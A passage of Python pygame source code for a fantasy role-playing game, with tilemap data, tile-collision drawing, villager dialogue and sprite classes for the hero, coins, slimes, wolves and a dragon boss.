[IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, WWALLBOTTOMLEFT, WWALLBOTTOM, WWALLBOTTOM, EEXIT, WWALLBOTTOM, WWALLBOTTOM, WWALLBOTTOMRIGHT, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK]
]
#Fifteenth Map
tilemapfifteen = [
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLTOPLEFT, WWALLTOP, WWALLTOP, WWALLTOP, BBOOKWALL, MMOUNTEDWALL, WWALLTOPRIGHT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, CCHAIRTWO, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORBASIC, CCHAIRONE, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLBOTTOMLEFT, WWALLBOTTOM, WWALLBOTTOM, EEXIT, WWALLBOTTOM, WWALLBOTTOM, WWALLBOTTOMRIGHT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK]
]
#Functions
def quitgame():
pg.quit()
quit()
def message_display(text, fontsize, timer, colour):
largeText = pg.font.Font('PressStart2P.ttf', fontsize)
TextSurf, TextRect = text_objects(text, largeText, colour)
TextRect.center = ((display_width / 2), 820)
while timer > 0:
GAMEDISPLAY.blit(scroll, (0, 740))
GAMEDISPLAY.blit(TextSurf, TextRect)
timer -= 0.1
pg.display.update(pg.Rect(0, 750, 1120, 300))
def text_objects(text, font, colour):
textSurface = font.render(text, True, colour)
return textSurface, textSurface.get_rect()
def intro_images():
displayBackground(tilemapone)
GAMEDISPLAY.blit(son, (970, 640))
def more_images():
GAMEDISPLAY.blit(mage, (855, 640))
GAMEDISPLAY.blit(firstpicture, (928, 640))
def display_image(image, x, y, timer):
GAMEDISPLAY.blit(image, (x, y))
pg.display.update()
time.sleep(timer)
def button(msg, x, y, w, h, ic, ac, action = None):
mouse = pg.mouse.get_pos()
click = pg.mouse.get_pressed()
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pg.draw.rect(GAMEDISPLAY, ac, (x, y, w, h))
if click[0] == 1 and action != None:
buttonsound.play()
action()
else:
pg.draw.rect(GAMEDISPLAY, ic, (x, y, w, h))
textSurf, textRect = text_objects(msg, smallText, black)
textRect.center = ((x + (w / 2)), (y + (h / 2)))
GAMEDISPLAY.blit(textSurf, textRect)
def stair():
stairsound.play()
def play_stairsound():
new_thread = threading.Timer(0, stair)
new_thread.start()
new_thread = threading.Timer(0.45, stair)
new_thread.start()
def displayBackground(mapnumber):
walls.empty()
doors.empty()
for row in range(MAPHEIGHT):
for column in range(MAPWIDTH):
GAMEDISPLAY.blit(tiles[mapnumber[row][column]], [column * tile_size, row * tile_size])
if tiles[mapnumber[row][column]] == HOUSE:
Wall((column * 80, row * 80), 80, 80, HOUSE)
Door((column * 80 + 38, row * 80 + 30), 3, 10)
if tiles[mapnumber[row][column]] == TREE:
Wall((column * 80, row * 80), 80, 80, TREE)
if tiles[mapnumber[row][column]] == ROCK:
Wall((column * 80, row * 80), 80, 80, ROCK)
if tiles[mapnumber[row][column]] == ROCKTWO:
Wall((column * 80, row * 80), 80, 80, ROCKTWO)
if tiles[mapnumber[row][column]] == WATER:
Wall((column * 80, row * 80), 80, 80, WATER)
if tiles[mapnumber[row][column]] == WATERTWO:
Wall((column * 80, row * 80), 80, 80, WATERTWO)
if tiles[mapnumber[row][column]] == WATERTHREE:
Wall((column * 80, row * 80), 80, 80, WATERTHREE)
if tiles[mapnumber[row][column]] == WATERFOUR:
Wall((column * 80, row * 80), 80, 80, WATERFOUR)
if tiles[mapnumber[row][column]] == WATERFIVE:
Wall((column * 80, row * 80), 80, 80, WATERFIVE)
if tiles[mapnumber[row][column]] == WATERSIX:
Wall((column * 80, row * 80), 80, 80, WATERSIX)
if tiles[mapnumber[row][column]] == WATERSEVEN:
Wall((column * 80, row * 80), 80, 80, WATERSEVEN)
if tiles[mapnumber[row][column]] == WATEREIGHT:
Wall((column * 80, row * 80), 80, 80, WATEREIGHT)
if tiles[mapnumber[row][column]] == WATERNINE:
Wall((column * 80, row * 80), 80, 80, WATERNINE)
if tiles[mapnumber[row][column]] == WATERTEN:
Wall((column * 80, row * 80), 80, 80, WATERTEN)
if tiles[mapnumber[row][column]] == WATERELEVEN:
Wall((column * 80, row * 80), 80, 80, WATERELEVEN)
if tiles[mapnumber[row][column]] == WATERTWELVE:
Wall((column * 80, row * 80), 80, 80, WATERTWELVE)
if tiles[mapnumber[row][column]] == WATERTHIRTEEN:
Wall((column * 80, row * 80), 80, 80, WATERTHIRTEEN)
if tiles[mapnumber[row][column]] == CAVEWALL:
Wall((column * 80, row * 80), 80, 80, CAVEWALL)
if tiles[mapnumber[row][column]] == CAVEWALLTWO:
Wall((column * 80, row * 80), 80, 80, CAVEWALLTWO)
if tiles[mapnumber[row][column]] == DARKTOP:
Wall((column * 80, row * 80), 80, 80, DARKTOP)
if tiles[mapnumber[row][column]] == DARKLEFT:
Wall((column * 80, row * 80), 80, 80, DARKLEFT)
if tiles[mapnumber[row][column]] == DARKRIGHT:
Wall((column * 80, row * 80), 80, 80, DARKRIGHT)
if tiles[mapnumber[row][column]] == CAVEROCK:
Wall((column * 80, row * 80), 80, 80, CAVEROCK)
if tiles[mapnumber[row][column]] == CAVEROCKTWO:
Wall((column * 80, row * 80), 80, 80, CAVEROCKTWO)
if tiles[mapnumber[row][column]] == SNOWTREE:
Wall((column * 80, row * 80), 80, 80, SNOWTREE)
if tiles[mapnumber[row][column]] == SNOWROCK:
Wall((column * 80, row * 80), 80, 80, SNOWROCK)
if tiles[mapnumber[row][column]] == HOUSETWO:
Wall((column * 80, row * 80), 80, 80, HOUSETWO)
Door((column * 80 + 38, row * 80 + 30), 3, 10)
if tiles[mapnumber[row][column]] == WALLTOPLEFT:
Wall((column * 80, row * 80), 80, 80, WALLTOPLEFT)
if tiles[mapnumber[row][column]] == WALLTOP:
Wall((column * 80, row * 80), 80, 80, WALLTOP)
if tiles[mapnumber[row][column]] == MOUNTEDWALL:
Wall((column * 80, row * 80), 80, 80, MOUNTEDWALL)
if tiles[mapnumber[row][column]] == BOOKWALL:
Wall((column * 80, row * 80), 80, 80, BOOKWALL)
if tiles[mapnumber[row][column]] == WALLBOTTOM:
Wall((column * 80, row * 80), 80, 80, WALLBOTTOM)
if tiles[mapnumber[row][column]] == WALLLEFT:
Wall((column * 80, row * 80), 80, 80, WALLLEFT)
if tiles[mapnumber[row][column]] == WALLRIGHT:
Wall((column * 80, row * 80), 80, 80, WALLRIGHT)
if tiles[mapnumber[row][column]] == WALLBOTTOMRIGHT:
Wall((column * 80, row * 80), 80, 80, WALLBOTTOMRIGHT)
if tiles[mapnumber[row][column]] == WALLBOTTOMLEFT:
Wall((column * 80, row * 80), 80, 80, WALLBOTTOMLEFT)
if tiles[mapnumber[row][column]] == TABLE:
Wall((column * 80, row * 80), 80, 80, TABLE)
if tiles[mapnumber[row][column]] == BED:
Wall((column * 80, row * 80), 80, 80, BED)
#Projectile Classes
class Bullet(pg.sprite.Sprite):
def __init__(self, x, y, direct, levelone):
self.groups = all_sprites, bullets
pg.sprite.Sprite.__init__(self, self.groups)
self.image = magic
self.rect = self.image.get_rect()
self.rect.x = x + 15
self.rect.y = y + 30
self.direction = direct
self.spawn_time = pg.time.get_ticks()
if levelone == True:
self.image = magic
else:
self.image = magictwo
def update(self):
if self.direction == 'left':
self.rect.x -= 8
if self.direction == 'right':
self.rect.x += 8
if self.direction == 'up':
self.rect.y -= 8
if self.direction == 'down':
self.rect.y += 8
if pg.time.get_ticks() - self.spawn_time > 1150 or self.rect.y < 0 or self.rect.y > display_height or self.rect.x < 0 or self.rect.x > display_width:
self.kill()
class Fireball(pg.sprite.Sprite):
def __init__(self, x, y, direct):
self.groups = all_sprites, fireballs
pg.sprite.Sprite.__init__(self, self.groups)
self.image = fire
self.rect = self.image.get_rect()
self.rect.x = x + 15
self.rect.y = y + 30
self.direction = direct
self.spawn_time = pg.time.get_ticks()
def update(self):
if self.direction == 'left':
self.rect.x -= 8
if self.direction == 'right':
self.rect.x += 8
if self.direction == 'up':
self.rect.y -= 8
if self.direction == 'down':
self.rect.y += 8
if self.rect.y < 0 or self.rect.y > display_height or self.rect.x < 0 or self.rect.x > display_width:
self.kill()
#Misc Classes
class Wall(pg.sprite.Sprite):
def __init__(self, wallpos, w, h, image):
self.groups = all_sprites, walls
pg.sprite.Sprite.__init__(self, self.groups)
self.image = image
self.rect = self.image.get_rect()
self.rect.topleft = wallpos
self.rect.width = w
self.rect.width = h
class SceneBase:
def __init__(self):
self.next = self
def Render(self, screen):
pass
def SwitchToScene(self, next_scene):
self.next = next_scene
bullets.empty()
def Terminate(self):
self.SwitchToScene(None)
class HappySprite(pg.sprite.Sprite):
def __init__(self):
pass
def get_frame(self, frame_set):
self.frame += 1
if self.frame > (len(frame_set) - 1):
self.frame = 0
return frame_set[self.frame]
def clip(self, clipped_rect):
if type(clipped_rect) is dict:
self.sheet.set_clip(pg.Rect(self.get_frame(clipped_rect)))
else:
self.sheet.set_clip(pg.Rect(clipped_rect))
return clipped_rect
class Coin(HappySprite):
def __init__(self, position, value):
self.groups = all_sprites, coins
pg.sprite.Sprite.__init__(self, self.groups)
self.value = value
self.sheet = coin_sheet
self.sheet.set_clip(pg.Rect(14, 0, 36, 64))
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.frame = 0
self.all_states = {0: (14, 0, 36, 64),
1: (78, 0, 36, 64),
2: (142, 0, 36, 64),
3: (206, 0, 36, 64),
4: (270, 0, 36, 64),
5: (334, 0, 36, 64),
6: (398, 0, 36, 64),
7: (462, 0, 36, 64)}
self.pick_sound = 0
def update(self, player_rect):
self.clip(self.all_states)
self.image = self.sheet.subsurface(self.sheet.get_clip())
if self.rect.colliderect(player_rect) == True:
if self.pick_sound < 1:
coin_sound.play()
self.pick_sound += 1
self.kill()
class Cloud(pg.sprite.Sprite):
def __init__(self, position, img):
self.groups = all_sprites, clouds
pg.sprite.Sprite.__init__(self, self.groups)
self.image = img
self.rect = self.image.get_rect()
self.rect.topleft = position
def update(self):
self.rect.x += 10
if self.rect.left > display_width:
self.kill()
class Door(pg.sprite.Sprite):
def __init__(self, doorpos, w, h):
self.groups = all_sprites, doors
pg.sprite.Sprite.__init__(self, self.groups)
self.rect = pg.Rect((doorpos), (w, h))
class Flower(pg.sprite.Sprite):
def __init__(self, position):
self.groups = all_sprites, desert_flower
pg.sprite.Sprite.__init__(self, self.groups)
self.image = flowerimg
self.rect = self.image.get_rect()
self.rect.topleft = position
class Shovel(pg.sprite.Sprite):
def __init__(self, position):
self.groups = all_sprites, shovels
pg.sprite.Sprite.__init__(self, self.groups)
self.image = shovelimg
self.rect = self.image.get_rect()
self.rect.topleft = position
self.price = 20
class HealthPotion(pg.sprite.Sprite):
def __init__(self, position):
self.groups = all_sprites, health_pots
pg.sprite.Sprite.__init__(self, self.groups)
self.image = potion_still
self.rect = self.image.get_rect()
self.rect.topleft = position
self.price = 6
#Walking Villager One
class FriendlySpriteTwo(HappySprite):
def __init__(self, position):
self.groups = all_sprites, friendly_two
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = walkingsprite
self.sheet.set_clip(pg.Rect(57, 0, 40, 52))
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.frame = 0
self.up_states = {0: (6, 157, 36, 53), 1: (58, 157, 38, 53), 2: (112, 157, 36, 53)}
self.down_states = {0: (4, 0, 43, 52), 1: (57, 0, 40, 52), 2: (108, 0, 41, 52)}
self.direction = 'down'
self.convonum = 0
self.quest = False
self.completed = False
def update(self, direction, playerrect):
if not self.rect.colliderect(playerrect):
if direction == 'up':
self.clip(self.up_states)
self.rect.y -= 3
if direction == 'down':
self.clip(self.down_states)
self.rect.y += 1
self.image = self.sheet.subsurface(self.sheet.get_clip())
def handle_event(self, direction, playersrect, events, playerquest, firespeed):
self.update('down', playersrect)
for wall in walls:
if self.rect.colliderect(wall.rect):
if direction == 'up':
self.rect.top = wall.rect.bottom
self.direction = 'down'
if direction == 'down':
self.rect.bottom = wall.rect.top
self.direction = 'up'
for characterone in character:
if events.type == pg.MOUSEBUTTONDOWN and self.rect.colliderect(playersrect):
self.msgtimer = 3.9
if playerquest == 5:
message_display('Are you okay? I heard the news...', 18, 700, black)
elif self.completed == True:
message_display('What do you want?', 19, 650, black)
elif playerquest == 11 and self.quest == True:
self.completed = True
message_display('Thanks! Here is an upgraded wand! Faster fire rate!', 16, 650, black)
upgradesound.play()
else:
if self.convonum == 0:
message_display('Those stupid slimes!', 19, 550, black)
self.convonum += 1
elif self.convonum == 1:
message_display('Go the the eastern plains and kill them-', 17, 760, black)
self.convonum += 1
elif self.convonum == 2:
self.quest = True
message_display('If you succeed I will give you an award!', 17, 650, black)
self.convonum += 1
elif self.convonum == 3:
message_display('What are you doing? Go out and kill the slimes!', 17, 600, black)
elif self.rect.colliderect(playersrect):
self.msgtimer = 3.91
message_display('Click the mouse to talk!', 20, self.msgtimer, black)
#Walking Villager Two
class FriendlySpriteThree(HappySprite):
def __init__(self, position):
self.groups = all_sprites, friendly_three
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = walkingtwosprite
self.sheet.set_clip(pg.Rect(52, 49, 38, 47))
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.frame = 0
self.left_states = {0: (4, 51, 39, 45), 1: (52, 49, 38, 47), 2: (100, 49, 39, 47)}
self.right_states = {0: (4, 99, 39, 45), 1: (54, 97, 37, 47), 2: (100, 99, 39, 45)}
self.direction = 'left'
def update(self, direction, playerrect):
if not self.rect.colliderect(playerrect):
if direction == 'right':
self.clip(self.right_states)
self.rect.x += 2
if direction == 'left':
self.clip(self.left_states)
self.rect.x -= 2
self.image = self.sheet.subsurface(self.sheet.get_clip())
def handle_event(self, direction, playersrect, events, playerquest):
for wall in walls:
if self.rect.colliderect(wall.rect):
if direction == 'right':
self.direction = 'left'
if direction == 'left':
self.direction = 'right'
for characterone in character:
if events.type == pg.MOUSEBUTTONDOWN and self.rect.colliderect(playersrect):
self.msgtimer = 3.9
if playerquest == 5:
message_display('You must seek revenge!', 19, 600, black)
else:
message_display('Hey! Good luck on your quest!', 19, 650, black)
elif self.rect.colliderect(playersrect):
self.msgtimer = 3.91
message_display('Click the mouse to talk!', 20, self.msgtimer, black)
#Class for the Player!
class Hero(HappySprite):
def __init__(self, position):
self.groups = all_sprites, character
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = characterssheet
self.sheet.set_clip(pg.Rect(55, 0, 47, 52))
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.collisionrect = pg.Rect(self.rect.x, self.rect.y + 35, self.rect.width, 17)
self.location = None
self.frame = 0
self.left_states = {0: (1, 52, 45, 53), 1: (54, 52, 44, 53), 2: (106, 52, 45, 53)}
self.right_states = {0: (7, 105, 44, 52), 1: (59, 105, 44, 52), 2: (112, 105, 44, 52)}
self.up_states = {0: (8, 157, 43, 53), 1: (61, 157, 42, 53), 2: (113, 157, 43, 53)}
self.down_states = {0: (3, 0, 44, 52), 1: (55, 0, 47, 52), 2: (108, 0, 46, 52)}
self.direction = 'down'
self.last_shot = 0
self.questlvl = 0
self.firespeed = 550
self.wand = 0
self.health = 900
self.healthlvl = 0
self.num_of_coins = 0
self.num_of_potions = 0
self.num_of_flowers = 0
self.num_of_shovels = 0
self.movespeed = 7.8
self.bootlvl = 0
self.max_health = 268
def get_location(self):
return self.location
def lower_health(self, value):
playerhitsound.play()
self.health -= (value + 5)
def increase_flowers(self):
self.num_of_flowers = 1
def heal(self, healthbarrect):
amountofheal = 50
if self.num_of_potions > 0:
while amountofheal > 0 and healthbarrect.right <= self.max_health:
healthbarrect.x += 1
amountofheal -= 1
self.num_of_potions -= 1
def update(self, direction):
if self.questlvl > 3:
if direction == 'left':
self.clip(self.left_states)
self.rect.x -= self.movespeed
self.collisionrect.x -= self.movespeed
if direction == 'right':
self.clip(self.right_states)
self.rect.x += self.movespeed
self.collisionrect.x += self.movespeed
if direction == 'up':
self.clip(self.up_states)
self.rect.y -= self.movespeed
self.collisionrect.y -= self.movespeed
if direction == 'down':
self.clip(self.down_states)
self.rect.y += self.movespeed
self.collisionrect.y += self.movespeed
if direction == 'stand_left':
self.clip(self.left_states[1])
if direction == 'stand_right':
self.clip(self.right_states[1])
if direction == 'stand_up':
self.clip(self.down_states[1])
if direction == 'stand_down':
self.clip(self.up_states[1])
self.image = self.sheet.subsurface(self.sheet.get_clip())
def handle_event(self, event, direction):
for wall in walls:
if self.collisionrect.colliderect(wall.rect):
if direction == 'left':
self.collisionrect.left = wall.rect.right
self.rect.left = self.collisionrect.left
if direction == 'right':
self.collisionrect.right = wall.rect.left
self.rect.right = self.collisionrect.right
if direction == 'up':
self.collisionrect.top = wall.rect.bottom
self.rect.top = self.collisionrect.top - 35
if direction == 'down':
self.collisionrect.bottom = wall.rect.top
self.rect.bottom = wall.rect.top
if event.type == pg.QUIT:
quitgame()
if event.type == pg.KEYDOWN:
if self.questlvl > 3:
if event.key == pg.K_LEFT or event.key == pg.K_RIGHT:
walkingsound.play()
elif event.key == pg.K_UP or event.key == pg.K_DOWN:
walkingtwosound.play()
if event.key == pg.K_LEFT:
self.update('left')
self.direction = 'left'
if event.key == pg.K_RIGHT:
self.update('right')
self.direction = 'right'
if event.key == pg.K_UP:
self.update('up')
self.direction = 'up'
if event.key == pg.K_DOWN:
self.update('down')
self.direction = 'down'
if event.type == pg.KEYUP:
walkingsound.stop()
walkingtwosound.stop()
if event.key == pg.K_LEFT:
self.update('stand_left')
if event.key == pg.K_RIGHT:
self.update('stand_right')
if event.key == pg.K_UP:
self.update('stand_down')
if event.key == pg.K_DOWN:
self.update('stand_up')
for coin in coins:
if self.collisionrect.colliderect(coin.rect):
self.num_of_coins += coin.value
def shoot(self):
if self.wand == 0:
bullet = Bullet(self.rect.x, self.rect.y, self.direction, True)
else:
bullet = Bullet(self.rect.x, self.rect.y, self.direction, False)
def setLocation(self, location):
self.location = location
#Health Classes
class Healthbar(pg.sprite.Sprite):
def __init__(self, playerhealth, position):
self.groups = all_sprites, health
pg.sprite.Sprite.__init__(self, self.groups)
self.health = playerhealth
self.image = healthstatus
self.rect = self.image.get_rect()
self.rect.topleft = position
self.upgradeonce = False
def lower(self, value):
self.rect.x -= (value * 5)
def upgrade(self):
self.rect.x += 28
class HealthBox(pg.sprite.Sprite):
def __init__(self, position, mode):
self.groups = all_sprites, healthbox
pg.sprite.Sprite.__init__(self, self.groups)
self.image = healthboximg
self.rect = self.image.get_rect()
self.rect.topleft = position
self.mode = mode
def healthupgrade(self):
mode = 1
self.kill()
class DragonHealthbar(pg.sprite.Sprite):
def __init__(self, dragon_health, position):
self.groups = all_sprites, dragonhealth
pg.sprite.Sprite.__init__(self, self.groups)
self.health = dragon_health
self.image = dragonstatus
self.rect = self.image.get_rect()
self.rect.topleft = position
def lower(self, value):
self.rect.x += (value * 5)
#Super class for all Enemy Mobs
class EnemyMob(HappySprite):
def __init__(self):
pass
def handle_event(self, event, direction, playerrect):
for wall in walls:
if self.rect.colliderect(wall.rect):
if direction == 'left':
self.rect.left = wall.rect.right
if direction == 'right':
self.rect.right = wall.rect.left
if direction == 'up':
self.rect.top = wall.rect.bottom
if direction == 'down':
self.rect.bottom = wall.rect.top
if self.health > 0:
if self.rect.centery > playerrect.centery and not self.rect.top < playerrect.bottom:
self.update('up')
self.direction = 'up'
elif self.rect.centerx < playerrect.centerx and not self.rect.right > playerrect.left:
self.update('right')
self.direction = 'right'
elif self.rect.centery < playerrect.centery and not self.rect.bottom > playerrect.top:
self.update('down')
self.direction = 'down'
elif self.rect.centerx >= playerrect.centerx and not self.rect.left < playerrect.right:
self.update('left')
self.direction = 'left'
if pg.sprite.spritecollideany(self, bullets, collided = None) != None:
self.health -= 0.1
if self.health > 0:
hitsound.play()
GAMEDISPLAY.blit(mobhit, (self.rect.centerx, self.rect.centery))
else:
if self.deathsound < 2:
deathsound.play()
self.deathsound += 1
new_coin = Coin((self.rect.x, self.rect.y), self.value)
self.kill()
def update(self, direction):
if direction == 'left':
self.clip(self.left_states)
self.rect.x -= self.movespeed
if direction == 'right':
self.clip(self.right_states)
self.rect.x += self.movespeed
if direction == 'up':
self.clip(self.up_states)
self.rect.y -= self.movespeed
if direction == 'down':
self.clip(self.down_states)
self.rect.y += self.movespeed
self.image = self.sheet.subsurface(self.sheet.get_clip())
#Inheritance of Enemy Mobs
class Bat(EnemyMob):
def __init__(self, position, facing):
self.group = bats
self.groups = all_sprites, bats
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = mobsprite
self.sheet.set_clip(pg.Rect(126, 11, 58, 30))
self.frame = 0
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.left_states = {0: (70, 193, 34, 42), 1: (134, 203, 34, 30), 2: (198, 203, 30, 42)}
self.right_states = {0: (76, 65, 34, 42), 1: (140, 75, 34, 30), 2: (208, 75, 30, 42)}
self.up_states = {0: (64, 137, 54, 44), 1: (126, 139, 58, 26), 2: (188, 129, 62, 40)}
self.down_states = {0: (64, 9, 54, 44), 1: (126, 11, 58, 30), 2: (188, 1, 62, 42)}
self.direction = facing
self.movespeed = 1.85
self.direction = 'down'
self.health = 0.5
self.sound = batsound
self.deathsound = 0
self.value = 2
class Slime(EnemyMob):
def __init__(self, position, facing):
self.group = slimes
self.groups = all_sprites, slimes
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = slime
self.sheet.set_clip(pg.Rect(173, 33, 28, 26))
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.frame = 0
self.left_states = {0: (47, 97, 26, 27), 1: (111, 97, 24, 28), 2: (175, 95, 24, 30)}
self.right_states = {0: (47, 161, 24, 28), 1: (111, 159, 24, 30), 2: (237, 161, 26, 27)}
self.up_states = {0: (45, 225, 28, 28), 1: (109, 223, 28, 30), 2: (237, 225, 30, 28)}
self.down_states = {0: (45, 33, 28, 28), 1: (109, 31, 28, 30), 2: (235, 33, 30, 28)}
self.direction = facing
self.movespeed = 1.65
self.direction = 'down'
self.health = 0.15
self.sound = slimesound
self.deathsound = 0
self.value = 1
class Deer(EnemyMob):
def __init__(self, position, facing):
self.group = deers
self.groups = all_sprites, deers
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = deer
self.sheet.set_clip(pg.Rect(78, 0, 36, 64))
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.frame = 0
self.left_states = {0: (0, 66, 62, 62), 1: (66, 68, 62, 60), 2: (128, 70, 64, 58)}
self.right_states = {0: (2, 130, 62, 62), 1: (66, 132, 62, 60), 2: (130, 134, 62, 58)}
self.up_states = {0: (18, 196, 30, 62), 1: (82, 194, 30, 62), 2: (146, 196, 30, 60)}
self.down_states = {0: (14, 2, 36, 62), 1: (78, 0, 36, 64), 2: (142, 4, 36, 60)}
self.direction = facing
self.movespeed = 1.75
self.direction = 'down'
self.health = 0.95
self.sound = deersound
self.deathsound = 0
self.value = 3
class Wolf(EnemyMob):
def __init__(self, position, facing):
self.group = wolves
self.groups = all_sprites, wolves
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = wolf
self.sheet.set_clip(pg.Rect(26, 8, 46, 86))
self.frame = 0
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.left_states = {0: (96, 128, 88, 60), 1: (194, 126, 92, 60), 2: (290, 128, 88, 58)}
self.right_states = {0: (6, 226, 88, 58), 1: (98, 224, 92, 60), 2: (200, 226, 88, 60)}
self.up_states = {0: (124, 300, 42, 84), 1: (220, 296, 42, 86), 2: (316, 300, 42, 84)}
self.down_states = {0: (122, 14, 46, 80), 1: (218, 8, 46, 86), 2: (314, 14, 46, 80)}
self.direction = facing
self.movespeed = 1.45
self.direction = 'down'
self.health = 1.5
self.sound = wolfsound
self.deathsound = 0
self.value = 4
class Scorpion(EnemyMob):
def __init__(self, position, facing):
self.group = scorpions
self.groups = all_sprites, scorpions
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = scorpion
self.sheet.set_clip(pg.Rect(78, 0, 36, 64))
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.frame = 0
self.left_states = {0: (0, 114, 64, 54), 1: (64, 114, 64, 54), 2: (128, 114, 64, 54)}
self.right_states = {0: (0, 170, 64, 54), 1: (63, 170, 64, 54), 2: (128, 170, 64, 54)}
self.up_states = {0: (0, 68, 50, 44), 1: (50, 68, 50, 44), 2: (100, 68, 50, 44)}
self.down_states = {0: (0, 0, 64, 64), 1: (64, 0, 64, 66), 2: (128, 0, 64, 64)}
self.direction = facing
self.movespeed = 1.77
self.direction = 'down'
self.health = 0.75
self.sound = scorpionsound
self.deathsound = 0
self.value = 2
class Dragon(EnemyMob):
def __init__(self, position, facing, mode):
self.group = dragons
self.groups = all_sprites, dragons
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = dragon
self.sheet.set_clip(pg.Rect(126, 11, 58, 30))
self.frame = 0
self.image = self.sheet.subsurface(self.sheet.get_clip())
self.rect = self.image.get_rect()
self.rect.topleft = position
self.left_states = {0: (0, 97, 97, 98), 1: (97, 97, 98, 98), 2: (195, 97, 94, 98)}
self.right_states = {0: (0, 195, 97, 97), 1: (97, 195, 98, 97), 2: (198, 195, 94, 97)}
self.up_states = {0: (3, 293, 94, 97), 1: (101, 292, 94, 97), 2: (198, 292, 94, 97)}
self.down_states = {0: (3, 0, 94, 97), 1: (101, 0, 94, 97), 2: (198, 0, 94, 97)}
self.direction = facing
self.movespeed = 1.05
self.direction = 'down'
self.health = 900
self.sound = dragonsound
self.deathsound = 0
self.last_shot = 0
self.firespeed = 100
self.value = 100
def fire(self, playerrect):
if self.health > 0 and playerrect.centerx >= self.rect.left and playerrect.centerx <= self.rect.right or playerrect.centery >= self.rect.top and playerrect.centery <= self.rect.bottom:
Fireball(self.rect.centerx, self.rect.centery, self.direction)
def anger(self):
if self.health > 0 and self.health < 250:
self.movespeed = 3.7
Fireball(self.rect.centerx, self.rect.centery, self.direction)
def lower_health(self, value):
self.health -= (value + 5)
#Dragon for Intro
class Startdragon(EnemyMob):
def __init__(self, position, facing, mode):
self.group = starterdragon
self.groups = all_sprites, starterdragon
pg.sprite.Sprite.__init__(self, self.groups)
self.sheet = dragon
